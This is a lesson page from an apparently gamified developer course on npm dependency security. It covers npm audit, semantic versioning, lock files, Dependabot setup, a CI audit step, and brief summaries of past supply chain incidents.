105
LVL 04 — SENIOR-IN-TRAININGSESSION 105DAY 105

DEPENDENCY SECURITY

← PREVNEXT →
🎫 PIXELCRAFT-091
🔒Security | 🟡 Medium | Priority: 🟠 High

npm audit reports 12 vulnerabilities (3 high, 9 moderate). Our dependencies have known flaws. Fix them all. Set up automated dependency updates. Understand the supply chain.
CONCEPTS.UNLOCKED
🔗
Supply Chain Security
Your app is only as secure as its dependencies. Your code trusts your dependencies. They trust THEIR dependencies. A vulnerability or malicious code in ANY transitive dependency affects YOUR app.
🔍
npm audit
Scan for known vulnerabilities. Checks every dependency against the GitHub Advisory Database. Reports severity: critical, high, moderate, low. Run it regularly — new vulnerabilities are discovered daily.
📌
Semantic Versioning
MAJOR.MINOR.PATCH → 2.1.3. ^2.1.3 means "compatible updates" (allows 2.x.x). ~2.1.3 means "patch updates only" (allows 2.1.x). Understand the caret and tilde — they control what npm install brings in.
🔒
Lock Files
package-lock.json ensures reproducible installs. Records exact versions of every dependency and sub-dependency. npm ci installs exactly what's in the lock file — same versions on every machine, every deploy.
🤖
Dependabot / Renovate
Automated dependency update PRs. Dependabot opens a PR when a new version is available. CI runs tests against the update. Green → merge. Automated, tested, continuous security updates.
⚖️
Update vs Replace
No updates in 2+ years? Consider replacing. Abandoned packages are a risk: no security patches, no compatibility updates. Find an actively maintained alternative or bring the code in-house.
HANDS-ON.TASKS
01
Run the Audit
npm audit # 12 vulnerabilities found # 3 high # 9 moderate # # Run `npm audit` for details
02
Auto-Fix Safe Updates
npm audit fix # Fixed 7 of 12 vulnerabilities # (safe, non-breaking updates) # For the remaining 5: npm audit fix --force # ⚠️ --force may install breaking # major version changes. # Review the changelog FIRST. # Better approach: update manually npm install package-name@latest # Then run tests to verify nothing broke.
03
Replace Abandoned Packages
# Check package health: # - Last published: > 2 years ago? ⚠️ # - Open issues piling up? ⚠️ # - Maintainer inactive? ⚠️ # Common replacements: # moment.js → date-fns or dayjs # request → node-fetch or undici # lodash → lodash-es (tree-shakeable) # Decision framework: # 1. Is there a maintained fork? # 2. Is there a modern alternative? # 3. Can you vendor the code (copy it)? # 4. Can you write it yourself?
04
Enable Dependabot
# .github/dependabot.yml version: 2 updates: - package-ecosystem: npm directory: "/" schedule: interval: weekly open-pull-requests-limit: 10 labels: - "dependencies" reviewers: - "your-username" # Dependabot will: # - Check for updates weekly # - Open PRs with changelogs # - CI runs tests against updates # - You review and merge # Automated, tested, continuous.
05
Add Audit to CI Pipeline
# Add to .github/workflows/ci.yml: - name: Security audit run: npm audit --audit-level=high # --audit-level=high: # Fail the build if HIGH or CRITICAL # vulnerabilities are found. # Moderate/low = warn but don't block. # Verify: npm audit # found 0 vulnerabilities ✅
06
Close the Ticket
git switch -c security/PIXELCRAFT-091-deps git add package.json package-lock.json .github/ git commit -m "Fix 12 dependency vulns + Dependabot (PIXELCRAFT-091)" git push origin security/PIXELCRAFT-091-deps # PR → Review → Merge → Close ticket ✅
CS.DEEP-DIVE

The software supply chain is a trust hierarchy.

Supply chain attacks are one of the fastest-growing security threats in software. Your code is only as secure as every package it depends on — including transitive dependencies you've never heard of.

// Trust chain:

Your code
  → trusts 50 direct dependencies
  → which trust 500 transitive deps
  → any one compromised = you're hit

// Notable incidents:

event-stream (2018)
  Hijacked npm package
  Stole cryptocurrency
  Downloaded 8M times

colors + faker (2022)
  Maintainer corrupted own packages
  Printed garbage to console
  Affected thousands of projects

ua-parser-js (2021)
  Hijacked to install cryptominers
  8M weekly downloads

// Mitigation:
// Audit regularly. Pin versions.
// Use lock files. Minimize deps.
// Automate updates. Stay vigilant.
"Supply Chain Lab"
[A]Run npx npm-check to find unused, outdated, and missing dependencies in PixelCraft. Remove unused packages — every dependency is attack surface. Less is more.
[B]Set up Socket.dev or Snyk for deeper supply chain analysis: detect typosquatting (lodash → l0dash), unusual install scripts, and obfuscated code. These catch threats that npm audit misses.
[C]Research: what is an SBOM (Software Bill of Materials)? How do companies like Google track every dependency in their supply chain? Write a brief analysis of supply chain security best practices for PixelCraft.
REF.MATERIAL
ARTICLE
npm audit — npm Docs
npm
Official audit documentation: running audits, understanding reports, fixing vulnerabilities, and configuring audit levels.
NPMOFFICIALESSENTIAL
ARTICLE
Dependabot — GitHub Docs
GitHub
Official Dependabot guide: configuration, security updates, version updates, and grouping strategies.
DEPENDABOTOFFICIAL
VIDEO
Supply Chain Security — Fireship
Fireship
Quick overview of npm supply chain attacks: event-stream, colors, and how to protect yourself. Why node_modules is a security nightmare.
SECURITYQUICK
ARTICLE
Semantic Versioning 2.0.0
Tom Preston-Werner
The semver spec: MAJOR.MINOR.PATCH, when to increment which, and what ^ and ~ mean in package.json. The versioning standard.
SEMVEROFFICIAL
ARTICLE
Socket.dev
Socket
Supply chain security: detect typosquatting, suspicious install scripts, and vulnerability risk. Deeper analysis than npm audit alone.
SECURITYTOOL
// LEAVE EXCITED BECAUSE
Zero vulnerabilities. Automated updates via Dependabot. CI blocks high-severity issues. You understand the supply chain — and how to protect against it.